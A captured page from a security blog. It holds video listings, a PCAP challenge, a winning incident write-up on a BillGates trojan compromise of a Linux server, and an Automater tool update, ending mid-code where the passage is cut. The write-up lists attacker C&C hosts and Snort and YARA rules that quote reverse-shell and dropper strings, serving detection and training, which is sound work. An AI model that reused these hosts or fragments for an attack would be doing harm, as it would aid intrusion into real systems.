Submitted URL: http://tekdefense.com/
Effective URL: http://www.tekdefense.com/
Submission: On October 10 via manual from US — Scanned from US

Security Videos
 
OWASP MobiSec

In this video Kevin talks about MobiSec; the full video is about OWASP
MobiSec. The MobiSec Live Environment Mobile Testing Framework project is a live
environment for testing mobile environments, including devices, applications,
and supporting infrastructure. The purpose is to give attackers and defenders
the ability to test their mobile environments to identify design weaknesses and
vulnerabilities. The MobiSec Live Environment provides a single environment for
testers to leverage the best of all available open source mobile testing tools,
as well as the ability to install additional tools and platforms that will aid
the penetration tester through the testing process, as the environment is
structured and organized based on an industry-proven testing framework. Using a
live environment lets penetration testers boot the MobiSec Live Environment on
any Intel-based system from a DVD or USB flash drive, or run the test
environment within a virtual machine.
https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_MobiSec
Securing Android Applications with GoatDroid

In this video you will learn how to secure Android applications using GoatDroid.
Using this tool we will also look at memory analysis, intercepting Layer 7
traffic, reverse engineering Android applications and SQLite database analysis.
About GoatDroid:
https://www.owasp.org/index.php/OWASP_Mobile_Security_Project
Finding the Rogue DHCP server With Wireshark

In this video you will learn how to detect a rogue DHCP server using Wireshark.
Rogue DHCP servers are becoming more common these days; a rogue DHCP server is
easy to set up and can be used to compromise a network.
nullcon Delhi 2012: How secure is internet banking in India - By Ajit Hatti

This research covers 7 major areas to evaluate the security of internet banking
provided by banks in India:

 1. Access Control
 2. Security of Data in Motion
 3. System Design
 4. Security on Hostile Platform
 5. Enforcement of best practices
 6. Handling Hostility or DDOS attacks
 7. Security as a Responsibility
Upload Shell via SQLi Injection

This video is all about web application hacking; you will learn how a shell is
uploaded using SQL injection.
NETWORK CHALLENGE - 001 - SOLUTION

Monday, October 3, 2016 at 8:09AM

I wanted to send a big thanks to everyone who sent in solutions for the
Network Challenge. While there were many responses, two (2) stood out amongst
the rest. I don't plan on doing prizes for all of these contests, but I was so
impressed by these responses that I wanted to do something special on this
occasion. The winners of this first challenge are:

 * First Place: @dfir_it ($150 Amazon Gift Card). Solution is below.
 * Second Place: @CYINT_DUDE ($50 Amazon Gift Card). Solution

The first place solution is so well written that I figured it was worth posting
in its entirety here (with permission from the author, of course). See below for
the solution, and keep an eye on dfir.it, where the author intends to post more
details on how he arrived at the answers you see below.


@DFIR_IT WINNING CONTEST SUBMISSION:

The report below attempts to provide answers to the objectives set in the
"NETWORK CHALLENGE - 001 - LINUX":

 1. Determine what likely occurred based on the evidence from the PCAP.
 2. Identify any network and/or host artifacts that could be used to scope this
    incident further.
 3. If applicable, write detection signatures (snort/suricata/yara) to increase
    coverage for this type of activity.

The report comprises multiple sections:

 * Findings - Describes main findings and provides an overview of malicious
   activity.
 * Analysis - Provides technical analysis of captured traffic and extracted
   artifacts.
 * Timeline - Provides chronologically ordered list of events.
 * Indicators - Provides a list of network and host indicators related with
   observed malicious activity.
 * References - Contains a list of external publications, indicators and
   resources used during analysis.


FINDINGS

 * The Linux system behind the IP address 104.236.210.97 was compromised at
   approximately 2016-09-07T22:14:48Z when the attacker successfully connected
   and authenticated to the system using the SSH protocol.
 * At 2016-09-07T22:16:16Z the attacker downloaded an instance of the BillGates
   trojan (java.log) from the remote IP address 120.210.129.29 running an HFS
   server on TCP port 5198.
 * At 2016-09-07T22:19:03Z the compromised system sent the first DNS Type A
   query for the domain top.t7ux.com. This event designates the approximate time
   when the attacker executed the malicious file java.log. At the same time the
   first "Hello" packet was sent by the compromised system to the C&C domain
   top.t7ux.com.
 * At approximately 2016-09-07T23:43:06Z the attacker likely initiated
   installation of the Apache httpd server by executing the following command:
   apt-get install apache2.
 * Between 2016-09-07T23:47:06Z and 2016-09-07T23:50:42Z the attacker downloaded
   additional malware and tools from the remote IP address 120.210.129.29. The
   files comprised multiple versions of the BillGates trojan, a reverse shell
   script, the Netcat utility and a backdoored version of OpenSSH.
 * Between 2016-09-07T23:52:18Z and 2016-09-07T23:53:05Z the remote IP address
   104.236.59.209 connected to the compromised system over TCP port 80 and
   downloaded two files: nc.exe and back.pl. The observed connections likely
   indicate that the attacker successfully installed and ran the Apache httpd
   server.
 * At 2016-09-08T01:22:06Z the attacker terminated the SSH session from the
   remote IP address 46.101.128.129.
 * The packet capture contained additional SSH packets from the remote IP
   address 71.171.119.98 between 2016-09-08T01:22:09Z and 2016-09-08T01:22:25Z.
   Based on the time of the event, the connection was likely also initiated by
   the attacker.
 * At 2016-09-08T10:18:13Z the compromised host attempted to connect to the IP
   address 222.174.168.234, the resolution of the C&C domain top.t7ux.com at
   that time.
 * At 2016-09-08T10:54:44Z the last packet to the C&C IP address 118.192.137.245
   was captured.
 * At 2016-09-09T13:46:05Z the compromised host sent 32038 UDP Flood packets to
   the IP address 23.83.106.115 over port 80.
 * At 2016-09-09T13:46:21Z the last packet to the C&C IP address 222.174.168.234
   was captured.


ANALYSIS

Analysis of the captured network traffic around the time (2016-09-07T22:16:16Z)
when the first alert for the "HFS [File Download]" Snort signature occurred
revealed the download of a suspicious file, java.log, from the remote IP address
120.210.129.29 by the host 104.236.210.97. Initial analysis showed that the file
was an instance of the BillGates trojan compiled for x86 Linux systems and
configured with two C&C servers: top.t7ux.com and www.vnc8.com.

Review of network connections to the system behind the IP address 104.236.210.97
around the time the malicious file was downloaded showed only one active SSH
connection, from the IP address 46.101.128.129. Based on this evidence and the
lack of other connections, it was determined that the attacker managed to
successfully authenticate and establish an interactive SSH connection to the
system. The system was likely initially compromised at approximately
2016-09-07T22:14:48Z. The SSH session was active for 3 hours and approximately
one megabyte of data was exchanged between the endpoints during that time.

At 2016-09-07T22:19:03Z the compromised system issued the first observed DNS
Type A query for the domain top.t7ux.com. At the same time the system
established a connection with the IP address 118.192.137.245 (the resolution of
top.t7ux.com at that time) over TCP port 16081 and sent data which has been
identified as the "Hello" packet generated by the BillGates trojan. The "Hello"
packet contained the kernel version of the compromised Linux system (Linux
4.4.0.0-36-generic) and the version of the malware (G2.40).

Between 2016-09-07T23:43:06Z and 2016-09-07T23:43:07Z the compromised system
established multiple HTTP connections to two legitimate domains,
mirrors.digitalocean.com and nyc2.mirrors.digitalocean.com, and downloaded
multiple .deb files. The files were determined to be legitimate software
packages of the Apache httpd server and its dependencies. In the absence of
additional interactive connections to the compromised system, it is likely that
it was the attacker who initiated installation of the Apache httpd server by
executing the following command: apt-get install apache2.

Between 2016-09-07T23:47:06Z and 2016-09-07T23:50:42Z the attacker downloaded
additional malware and tools from the remote IP address 120.210.129.29. The
table below summarizes the files downloaded by the attacker:

| Filename | MD5 | Type | Architecture | VT Detection | C&C | Description |
|---|---|---|---|---|---|---|
| java.log | f4b3ec28a7b92de2821c221ef0faed5b | ELF | x86 | Linux/BillGates | top.t7ux.com, www.vnc8.com | BillGates trojan Linux binary |
| 16081 | c3a59d53af7571b0689e5c059311dbbe | ELF | x86 | Linux/BillGates | top.t7ux.com, www.vnc8.com | BillGates trojan Linux binary |
| 2.6.32 | ff1e9d1fc459dd83333fd94dbe36229a | ELF | x64 | CVE-2013-2094 | - | CVE-2013-2094 privilege escalation exploit (source code) |
| back.pl | fbaeef2b329b8c0427064eb883e3b999 | Perl | - | - | - | Reverse shell script written in Perl |
| nc.exe | 1c207af4a791c5e87dcd209f2dc62bb8 | PE | x86 | Tool.Netcat | - | Windows Netcat tool (UPX packed) |
| or.bin | 09b62916547477cc44121e39e1d6cc26 | Bash | - | - | - | Bash script. Contained a compressed and DES-encrypted backdoored version of OpenSSH (openssh-5.9p1.tgz) |
| SYN/Trustr | cd291abe2f5f9bc9bc63a189a68cac82 | ELF | x86 | Linux/BillGates | top.t7ux.com, www.vnc8.com | BillGates trojan Linux binary |
| SYN_1902 | 3e9a55d507d6707ab32bc1e0ba37a01a | ELF | x86 | Linux/BillGates | liv.t7ux.com, www.vnc8.com | BillGates trojan Linux binary |
| winappes.exe/Windows_1902 | a91261551c31a5d9eec87a8435d5d337 | PE | x86 | BackDoor.Gates.8 | liv.t7ux.com | BillGates trojan Windows binary |
| xmapp | c5593d522903e15a7ef02323543db14c | ELF | x86 | - | liv.t7ux.com, www.t7ux.com | BillGates trojan Linux binary |

The provided packet capture did not contain traces of traffic to the C&C
domains identified during initial analysis of the extracted files, which likely
indicates that the attacker did not execute additional instances of the
BillGates trojan. One of the extracted files, or.bin, contained an installation
script that extracted, decrypted and installed a likely backdoored version of
the OpenSSH daemon (openssh-5.9p1.tgz). Analysis of the SSH server versions sent
by the compromised host during negotiation of subsequent SSH connections did
not reveal the presence of the OpenSSH-5.9p1 string.

Between 2016-09-07T23:52:18Z and 2016-09-07T23:53:05Z the remote IP address
104.236.59.209 connected to the compromised system over TCP port 80 and
downloaded two files: nc.exe and back.pl. The HTTP server on the compromised
system identified itself as Apache/2.4.18 (Ubuntu), which suggests that the
attacker successfully managed to install and run the Apache httpd server. The
system behind the IP address 104.236.59.209 may be another host compromised by
the same attacker.

At 2016-09-08T01:22:06Z the attacker terminated the SSH session from the remote
IP address 46.101.128.129. Analysis of the traffic showed an additional SSH
session to be active around the same time, initiated from the IP address
71.171.119.98. The packet capture contained only a small fragment of the data
exchanged between 2016-09-08T01:22:09Z and 2016-09-08T01:22:25Z.

At approximately 2016-09-08T10:18:13Z the C&C domain top.t7ux.com started
resolving to the new IP address 222.174.168.234. At the same time the
compromised host attempted to connect to the new C&C IP address over TCP port
16081. At 2016-09-08T12:08:12Z the compromised host managed to successfully
connect to the C&C address and sent a "Hello" packet.

At 2016-09-09T13:46:05Z the compromised host sent 32038 UDP Flood packets to the
IP address 23.83.106.115 over port 80. Analysis of the provided PCAP did not
reveal any packets sent by the C&C server instructing the BillGates trojan
running on the compromised host to initiate a Denial of Service attack against
the IP address 23.83.106.115. Between 2016-09-09T13:46:05Z and
2016-09-09T13:46:21Z the compromised host sent multiple packets containing the
string "23.83.106.115" to the C&C server, likely as a confirmation of the
performed UDP Flood attack.

Last packet to the C&C server was captured at 2016-09-09T13:46:21Z.


TIMELINE

| Timestamp | Source IP Address | Destination IP Address | Protocol/Destination Port | Event Description |
|---|---|---|---|---|
| 2016-09-07T22:14:48Z | 46.101.128.129 | 104.236.210.97 | TCP/22 | Initial SSH connection from the remote IP address 46.101.128.129. Duration: approximately 1m. |
| 2016-09-07T22:16:07Z | 46.101.128.129 | 104.236.210.97 | TCP/22 | Second SSH connection from the remote IP address 46.101.128.129. Duration: approximately 3h. |
| 2016-09-07T22:16:16Z | 104.236.210.97 | 120.210.129.29 | TCP/5198 | Download of the BillGates trojan ELF binary java.log to the compromised host. |
| 2016-09-07T22:16:16Z | 120.210.129.29 | 104.236.210.97 | TCP/47520 | Initial alert on the HFS [File Download] Snort signature. |
| 2016-09-07T22:19:03Z | 104.236.210.97 | 8.8.8.8 | UDP/53 | First observed DNS Type A query for the domain top.t7ux.com. Resolution: 118.192.137.245. |
| 2016-09-07T22:19:03Z | 104.236.210.97 | 118.192.137.245 | TCP/16081 | First observed Hello beacon to the C&C IP address 118.192.137.245. |
| 2016-09-07T23:43:06Z | 104.236.210.97 | 198.199.99.226 | TCP/80 | Initiated transfer of multiple legitimate Ubuntu packages from the remote host mirrors.digitalocean.com. |
| 2016-09-07T23:43:06Z | 104.236.210.97 | 192.241.164.26 | TCP/80 | Initiated transfer of multiple legitimate Ubuntu packages from the remote host nyc2.mirrors.digitalocean.com. |
| 2016-09-07T23:47:06Z | 104.236.210.97 | 120.210.129.29 | TCP/5198 | Download of the BillGates trojan ELF binary 16081 to the compromised host. |
| 2016-09-07T23:47:24Z | 104.236.210.97 | 120.210.129.29 | TCP/5198 | Download of the CVE-2013-2094 exploit file 2.6.32 to the compromised host. |
| 2016-09-07T23:47:32Z | 104.236.210.97 | 120.210.129.29 | TCP/5198 | Download of the reverse shell script back.pl to the compromised host. |
| 2016-09-07T23:47:41Z | 104.236.210.97 | 120.210.129.29 | TCP/5198 | Download of the Netcat PE binary nc.exe to the compromised host. |
| 2016-09-07T23:47:50Z | 104.236.210.97 | 120.210.129.29 | TCP/5198 | Download of the Bash script or.bin to the compromised host. |
| 2016-09-07T23:49:07Z | 104.236.210.97 | 120.210.129.29 | TCP/5198 | Download of the BillGates trojan ELF binary SYN to the compromised host. |
| 2016-09-07T23:49:18Z | 104.236.210.97 | 120.210.129.29 | TCP/5198 | Download of the BillGates trojan ELF binary SYN_1902 to the compromised host. |
| 2016-09-07T23:49:40Z | 104.236.210.97 | 120.210.129.29 | TCP/5198 | Download of the BillGates trojan ELF binary Trustr to the compromised host. |
| 2016-09-07T23:50:06Z | 104.236.210.97 | 120.210.129.29 | TCP/5198 | Download of the BillGates trojan PE binary winappes.exe to the compromised host. |
| 2016-09-07T23:50:24Z | 104.236.210.97 | 120.210.129.29 | TCP/5198 | Download of the BillGates trojan PE binary Windows_1902 to the compromised host. |
| 2016-09-07T23:50:42Z | 104.236.210.97 | 120.210.129.29 | TCP/5198 | Download of the BillGates trojan ELF binary xmapp to the compromised host. |
| 2016-09-07T23:52:18Z | 104.236.59.209 | 104.236.210.97 | TCP/80 | Download of the Netcat PE binary nc.exe from the compromised host. |
| 2016-09-07T23:53:05Z | 104.236.59.209 | 104.236.210.97 | TCP/80 | Download of the reverse shell script back.pl from the compromised host. |
| 2016-09-08T01:22:06Z | 46.101.128.129 | 104.236.210.97 | TCP/22 | End of the second SSH connection from the remote IP address 46.101.128.129. |
| 2016-09-08T01:22:09Z | 71.171.119.98 | 104.236.210.97 | TCP/22 | First captured packet of SSH connection to the compromised host from the IP address 71.171.119.98. |
| 2016-09-08T01:22:25Z | 71.171.119.98 | 104.236.210.97 | TCP/22 | Last captured packet of SSH connection to the compromised host from the IP address 71.171.119.98. |
| 2016-09-08T10:18:13Z | 8.8.8.8 | 104.236.210.97 | UDP/55022 | First observed DNS response pointing the top.t7ux.com domain to the new IP address 222.174.168.234. |
| 2016-09-08T10:18:13Z | 104.236.210.97 | 222.174.168.234 | TCP/16081 | First observed attempted connection to the C&C IP address 222.174.168.234. |
| 2016-09-08T10:54:44Z | 104.236.210.97 | 118.192.137.245 | TCP/16081 | Last observed TCP packet sent to the C&C IP address 118.192.137.245. |
| 2016-09-09T13:46:05Z | 104.236.210.97 | 23.83.106.115 | UDP/80 | 32038 UDP Flood packets sent to the remote IP address 23.83.106.115. |
| 2016-09-09T13:46:21Z | 104.236.210.97 | 222.174.168.234 | TCP/16081 | Last observed TCP packet sent to the C&C IP address 222.174.168.234. |


INDICATORS

IP ADDRESSES AND DOMAINS

The list of network indicators below is based solely on network traffic observed
in the provided PCAP and analysis of the extracted artifacts:

| IP Address/Domain | Description |
|---|---|
| 46.101.128.129 | Source of suspicious SSH connection to the compromised host. |
| 71.171.119.98 | Source of suspicious SSH connection to the compromised host. |
| 120.210.129.29 | HFS server hosting attacker's malware and tools. |
| 118.192.137.245 | Resolution of top.t7ux.com. BillGates Trojan C&C. |
| 222.174.168.234 | Resolution of top.t7ux.com. BillGates Trojan C&C. |
| 104.236.59.209 | Downloaded nc.exe and back.pl from the compromised host. |
| top.t7ux.com | C&C of BillGates Trojan |
| www.vnc8.com | C&C of BillGates Trojan |
| liv.t7ux.com | C&C of BillGates Trojan |
| www.t7ux.com | C&C of BillGates Trojan |

SNORT SIGNATURES

 * BillGates Trojan - "Hello" packet

alert tcp any any -> any any (msg:"BillGates Trojan [Hello]"; content:"|01 00 00 00|"; content:"|00 00 00 00 f4 01 00 00 32 00 00 00 e8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00|"; offset:5; pcre:"/(Linux|Windows)/"; byte_test:1,>,96,4; byte_test:1,<,160,4; dsize:<160; threshold:type limit, track by_src, count 1, seconds 3600; sid:999998; rev:1;)


 * BillGates Trojan - Transfer of Linux binary

alert tcp any any -> any any (msg:"BillGates Trojan [Linux - Transfer]"; content:"GatesType"; content:"AttackBase"; distance:5; within:20; content:"ThreadShell"; distance:10; within:20; threshold:type limit, track by_src, count 1, seconds 60; sid:999997; rev:1;)


 * BillGates Trojan - Transfer of Windows binary

alert tcp any any -> any any (msg:"BillGates Trojan [Windows - Transfer]"; content:"FakeDetectPayload"; content:"FakeDetectInfo"; distance:15; within:20; content:"ShellCmd"; distance:15; within:20; threshold:type limit, track by_src, count 1, seconds 60; sid:999996; rev:1;)


 * back.pl - Successful reverse shell connection

alert tcp any any -> any any (msg:"Reverse Shell [back.pl]"; flow: from_client, established; content:"Enjoy the shell.|0a|"; depth:17; dsize:<256; sid:999995; rev:1;)


 * 2.6.32 CVE-2013-2094 exploit - Transfer of the binary

alert tcp any any -> any any (msg:"Exploit [CVE-2013-2094 - Transfer]"; content:"!close(fd)|00|map[i+1]|00|i<0x010000000/4"; sid:999994; rev:1;)


 * BillGates Trojan - UDP Flood packet

alert udp any any -> any any (msg:"BillGates Trojan [UDP Flood]"; content:"|00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00|"; depth:16; pcre:"/\x00{900}/"; dsize:>900; threshold:type limit, track by_src, count 1, seconds 3600; sid:999993; rev:1;)


YARA RULES

 * BillGates Trojan (Windows and Linux binaries)

rule BillGates
{
	strings:
		$elf = "\x7fELF"
		$mz = "MZ"
		$b1 = "ThreadShell"
		$b2 = "CheckGatesType"
		$b3 = "AttackBase"
		$b4 = "PacketAttack"
		$b5 = "agony.pdb"
		$b6 = "Gates.pdb"
		$b7 = "Beikong"
	condition:
		($elf at 0 or $mz at 0) and 2 of ($b*)
}


 * Reverse shell script back.pl

rule Back
{
	strings:
		$s1 = "Remote_IP Remote_Port \\n\";"
		$s2 = "\"Enjoy the shell.\\n\";"
	condition:
		2 of ($s*)
}


 * UPX-packed Netcat tool nc.exe

import "pe"

rule Netcat_UPX
{
	condition:
		pe.characteristics and pe.sections[0].name == "UPX0" and pe.sections[1].name == "UPX1" and pe.sections[2].name == "UPX2" and pe.imports("WSOCK32.dll") and filesize == 28160
}


 * Bash script or.bin

rule or_bin
{
	strings:
		$o1 = "mkdir /tmp/.tmp123 -p && tail -n $line $0 |tar zx -C /tmp/.tmp123"
		$o2 = { 0a 1f 8b 08 00}
	condition:
		2 of ($o*)
}


 * CVE-2013-2094 exploit ELF binary 2.6.32

rule CVE_2013_2094_Exploit
{
	strings:
		$elf = "\x7fELF"
		$s1 = "semtex.c"
		$s2 = "!close(fd)"
		$s3 = "map[i+1]"
		$s4 = "i<0x010000000/4"
		$s5 = "!setuid(0)"
		$s6 = "/bin/bash"
		$s7 = "2.6.37-3.x x86_64"
		$s8 = "sd@fucksheep.org 2010"
	condition:
		$elf at 0 and 3 of ($s*)
}


HOST INDICATORS

Existence of the following files on a filesystem can indicate that the BillGates
Trojan was executed on a host. The list is based on execution of the java.log
file on a sandbox system:

/tmp/gates.lod
/tmp/moni.lod
/usr/bin/.sshd
/usr/bin/dpkgd/lsof
/usr/bin/dpkgd/netstat
/usr/bin/dpkgd/ps
/usr/bin/dpkgd/ss
/usr/bin/bsd-port/getty
/usr/bin/bsd-port/getty.lock
/etc/rc2.d/S97DbSecuritySpt
/etc/rc3.d/S97DbSecuritySpt
/etc/rc5.d/S97DbSecuritySpt
/etc/rc4.d/S97DbSecuritySpt
/etc/rc1.d/S97DbSecuritySpt
/etc/rc2.d/S99selinux
/etc/rc3.d/S99selinux
/etc/rc5.d/S99selinux
/etc/rc4.d/S99selinux
/etc/rc1.d/S99selinux
/etc/init.d/selinux



REFERENCES

 * Malware Must Die: MMD-0039-2015: ChinaZ made new malware: ELF
   Linux/BillGates.Lite
 * Malware Must Die: China ELF botnet malware infection & distribution scheme
   unleashed
 * Malware Must Die: China ELF botnet malware infection scheme unleashed (video)
 * Akamai: BillGates Botnet Malware Used in Large DDoS Attacks
 * Novetta: The Elastic Botnet Report
 * Securelist: Versatile DDoS Trojan for Linux
 * Thisissecurity: When ELF.BillGates met Windows
 * Botconf: Chinese Chicken - Multiplatform DDoS botnets

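As an added example (not part of the submission or the original post), the following Python re-implements the checks of the "Hello" (sid:999998) and "UDP Flood" (sid:999993) Snort signatures from the submission above, including their threshold:type limit suppression, and runs them over constructed sample packets. Everything about the Hello payload that the signature does not pin down (bytes 4-7 as a length field, where the kernel and version strings sit) is an assumption of this example, not a documented format.

```python
import re

# Byte patterns lifted from the "Hello" (sid:999998) and "UDP Flood"
# (sid:999993) Snort signatures in the submission above.
HELLO_MAGIC = b"\x01\x00\x00\x00"                        # content:"|01 00 00 00|"
HELLO_CONST = (bytes.fromhex("00000000f401000032000000e8030000")
               + b"\x00" * 13)                           # second content, offset:5
OS_RE = re.compile(rb"(Linux|Windows)")                  # pcre:"/(Linux|Windows)/"
ZERO_RUN = b"\x00" * 900                                 # pcre:"/\x00{900}/"


def is_billgates_hello(payload: bytes) -> bool:
    """Apply every check of sid:999998 to one TCP payload."""
    if len(payload) >= 160:                  # dsize:<160
        return False
    if HELLO_MAGIC not in payload:           # first content, anywhere in payload
        return False
    if payload.find(HELLO_CONST, 5) < 0:     # second content, search starts at offset 5
        return False
    # byte_test:1,>,96,4 and byte_test:1,<,160,4 constrain the byte at offset 4
    if not 96 < payload[4] < 160:
        return False
    return OS_RE.search(payload) is not None


def is_billgates_udp_flood(payload: bytes) -> bool:
    """Apply every check of sid:999993 to one UDP payload."""
    if len(payload) <= 900:                  # dsize:>900
        return False
    if payload[:16] != b"\x00" * 16:         # sixteen NULs within depth:16
        return False
    return ZERO_RUN in payload               # a run of at least 900 NULs


class LimitThreshold:
    """threshold:type limit, track by_src, count N, seconds S:
    let at most N alerts through per source in each S-second window."""

    def __init__(self, count: int, seconds: int):
        self.count, self.seconds = count, seconds
        self._windows = {}                   # src -> [window_start, alerts_so_far]

    def allow(self, src: str, now: float) -> bool:
        win = self._windows.get(src)
        if win is None or now - win[0] >= self.seconds:
            self._windows[src] = [now, 1]    # open a new window for this source
            return True
        if win[1] < self.count:
            win[1] += 1
            return True
        return False                         # suppressed for the rest of the window


def run_rules(packets):
    """packets: iterable of (timestamp, src_ip, 'tcp'|'udp', payload).
    Returns the alerts that would fire, as (timestamp, src_ip, msg)."""
    rules = [
        ("BillGates Trojan [Hello]", "tcp", is_billgates_hello, LimitThreshold(1, 3600)),
        ("BillGates Trojan [UDP Flood]", "udp", is_billgates_udp_flood, LimitThreshold(1, 3600)),
    ]
    alerts = []
    for ts, src, proto, payload in packets:
        for msg, rule_proto, matches, threshold in rules:
            if proto == rule_proto and matches(payload) and threshold.allow(src, ts):
                alerts.append((ts, src, msg))
    return alerts


def build_hello(kernel: bytes, version: bytes, size: int = 126) -> bytes:
    """Constructed sample Hello payload (not a real capture). It is shaped to
    satisfy sid:999998; treating bytes 4-7 as a little-endian length field and
    placing the kernel/version strings after the constant is an assumption."""
    body = (HELLO_MAGIC + bytes([size, 0, 0, 0]) + HELLO_CONST
            + kernel + b"\x00" + version + b"\x00")
    return body.ljust(size, b"\x00")


# Constructed traffic sample; the source IP is the compromised host from the report.
SAMPLE_PACKETS = [
    (0.0, "104.236.210.97", "tcp", build_hello(b"Linux 4.4.0.0-36-generic", b"G2.40")),
    (60.0, "104.236.210.97", "tcp", build_hello(b"Linux 4.4.0.0-36-generic", b"G2.40")),  # same hour: suppressed
    (120.0, "104.236.210.97", "tcp", b"GET / HTTP/1.1\r\nHost: mirrors.digitalocean.com\r\n\r\n"),  # benign
    (3600.5, "104.236.210.97", "tcp", build_hello(b"Linux 4.4.0.0-36-generic", b"G2.40")),  # new window
    (4000.0, "104.236.210.97", "udp", b"\x00" * 1024),   # flood packet
    (4000.1, "104.236.210.97", "udp", b"\x00" * 1024),   # same hour: suppressed
]

if __name__ == "__main__":
    for ts, src, msg in run_rules(SAMPLE_PACKETS):
        print(f"{ts:8.1f}  {src}  {msg}")
```

Running the block prints three alerts: the first Hello beacon, the Hello that falls into the next one-hour window, and the first UDP flood packet; the repeats within a window are suppressed exactly as the threshold clause would suppress them in Snort.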




NETWORK CHALLENGE - 001 - LINUX

Friday, September 16, 2016 at 9:04AM

One of my favorite sites is "Malware Traffic Analysis" where the author
routinely posts network challenges. In the spirit of contributing to this effort
of providing material for analysts to sharpen their skills, I developed a
challenge focused around a popular scenario I often come across in research and
other analysis efforts. As a heads up, any malware you may come across in the
analysis of this PCAP is in fact real malware. Please take care in how you
analyze. 

When reviewing this PCAP and writing your response please keep in mind what you
would really want in an investigation. The questions I ask at the end of this
article are intentionally vague, as I didn't want to give too much away with the
questions. What I am hoping to see in responses is that the analysts are able to
adequately tell a story of what likely occurred, identify network and host
indicators that can help further scope this incident, and write detection rules
in the detection languages of their choice to find future instances of this
activity. 

PCAP DOWNLOAD

The due date for submissions is September 25, 2016. Enjoy!


SCENARIO:

The client provides a PCAP containing all the traffic they have from a victim
Linux server. A Snort signature alerted on files downloaded from an HFS server.
The client has no other context to provide, other than the following Snort
signature that alerted:

> alert tcp any any -> any any (msg:"HFS [File
> Download]";flow:to_client,established; content:"HFS 2.";distance:0;
> content:"HFS_SID="; classtype:suspicious; sid:999999; rev:1;)


OBJECTIVE:

 1. Determine what likely occurred based on the evidence from the PCAP.
 2. Identify any network and/or host artifacts that could be used to scope this
    incident further.
 3. If applicable, write detection signatures (snort/suricata/yara) to increase
    coverage for this type of activity. 


SUBMISSIONS:

Feel free to submit your responses directly to NetChallenge[at]tekdefense.com or
comment on this blog post with a link to your own article with a response. I'll
review responses, and perhaps give out a few prizes to those with great
writeups.





AUTOMATER UPDATE .21

Friday, November 20, 2015 at 8:30AM


KEEPING AUTOMATER UP TO DATE:

Download the latest version: https://github.com/1aN0rmus/TekDefense-Automater

One of the more notable additions in version .21 of Automater is that users no
longer need to keep watching the GitHub site to ensure all of the Python modules
are the latest version. By adding -Vv to the command line arguments, Automater
will check whether the local Python modules match the modules on the TekDefense
Automater GitHub site. The -V (--vercheck) argument tells Automater to check the
modules, and the lowercase -v (--verbose) is required to make Automater report
the outcome. If the files don't match, Automater prints a notification to stdout
telling the user which module has been modified, so up-to-date modules can be
pulled if the user wants. The -v (--verbose) option turns on or off all
information sent to stdout, so it can be used to either silence Automater or let
it talk.


Arguably an even better addition is another "version" check of sorts. The
sites.xml file is still required locally so that Automater can get instructions
on which sites to check and which regexes to report on. However, Automater now
also looks for a tekdefense.xml file and uses it if it is found locally. The
significance is that with the -r (--refreshxml) switch included in the command
line call, Automater will check the TekDefense Automater GitHub site and pull
the tekdefense.xml file for use. If the -r switch is used and the local
tekdefense.xml file differs from the one on GitHub, the modified (updated) file
on GitHub is pulled and used. This ensures that you can make your own calls with
the sites.xml file while ALSO keeping the calls to sites and checks maintained
by the TekDefense crew. Together this gives the Automater user the best coverage
with no modifications required or manual processes to follow.




NEW REQUIREMENTS AND WHAT THEY MEAN:


The new Automater has several updates. Out of the blocks, the requests module
(version 2.7 or above) is now required to run Automater. For instructions on
getting the requests module if you don't already have it, see
http://docs.python-requests.org/en/latest/user/install/. This gives us better
control over returning HTML and sets us up for further upgrades in the near
future when we begin using JSON APIs and data collecting capabilities; more on
this as things progress. Using requests, the default timeout of GET calls to web
sites is now set to 5 seconds, so Automater moves on after waiting 5 seconds for
a response from a web site. However, if a web site does respond and provide some
input but is slow in its response time, the GET request will not time out; this
timeout only applies to sites that simply don't respond. Further refinements on
this subject will continue in future upgrades. There are several bug fixes and
other modifications, and we will soon thread Automater to provide better
response times. For instance, the delay feature was fixed.

> .\Automater.py -h
> usage: Automater.py [-h] [-o OUTPUT] [-b] [-f CEF] [-w WEB] [-c CSV]
>                     [-d DELAY] [-s SOURCE] [--proxy PROXY] [-a USERAGENT] [-V]
>                     [-r] [-v]
>                     target
> 
> IP, URL, and Hash Passive Analysis tool
> 
> positional arguments:
>   target                List one IP Address (CIDR or dash notation accepted),
>                         URL or Hash to query or pass the filename of a file
>                         containing IP Address info, URL or Hash to query each
>                         separated by a newline.
> 
> optional arguments:
>   -h, --help            show this help message and exit
>   -o OUTPUT, --output OUTPUT
>                         This option will output the results to a file.
>   -b, --bot             This option will output minimized results for a bot.
>   -f CEF, --cef CEF     This option will output the results to a CEF formatted
>                         file.
>   -w WEB, --web WEB     This option will output the results to an HTML file.
>   -c CSV, --csv CSV     This option will output the results to a CSV file.
>   -d DELAY, --delay DELAY
>                         This will change the delay to the inputted seconds.
>                         Default is 2.
>   -s SOURCE, --source SOURCE
>                         This option will only run the target against a
>                         specific source engine to pull associated domains.
>                         Options are defined in the name attribute of the site
>                         element in the XML configuration file. This can be a
>                         list of names separated by a semicolon.
>   --proxy PROXY         This option will set a proxy to use (eg.
>                         proxy.example.com:8080)
>   -a USERAGENT, --useragent USERAGENT
>                         This option allows the user to set the user-agent seen
>                         by web servers being utilized. By default, the user-
>                         agent is set to Automater/version
>   -V, --vercheck        This option checks and reports versioning for
>                         Automater. Checks each python module in the Automater
>                         scope. Default, (no -V) is False
>   -r, --refreshxml      This option refreshes the tekdefense.xml file from the
>                         remote GitHub site. Default (no -r) is False.
>   -v, --verbose         This option prints messages to the screen. Default (no
>                         -v) is False.



Specific sites (already in the sites.xml or tekdefense.xml file) can be called
in case the user only wants responses from specific sites. While previous
versions of Automater allowed this function for one site using the -s (--source)
switch, the new version allows multiple sites to be utilized by separating the
required sites with a semicolon. So in the past, if the user had a sites.xml
file with the totalhash_ip entry, the user could call Automater with -s
totalhash_ip and only receive information about totalhash. However, if the user
now wants more than totalhash output, but not all information in the sites.xml
or tekdefense.xml file(s), he could enter something like Automater -s
totalhash_ip;robtex to get totalhash and robtex information. Any site within the
sites.xml or tekdefense.xml can be joined in this way using the semicolon
separator between sites.
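The following is an added example, not Automater's own code, of how a semicolon-separated -s/--source value can be resolved against the name attribute of site elements in a sites.xml-style file. The XML fragment is a constructed stand-in: only the `<site name="...">` convention comes from the help text above, and the rest of the layout (the `domainurl` child, the sample site names other than totalhash_ip and robtex) is assumed.

```python
"""Added example (not Automater's own code): resolve a semicolon-separated
-s/--source value against the name attribute of <site> elements in a
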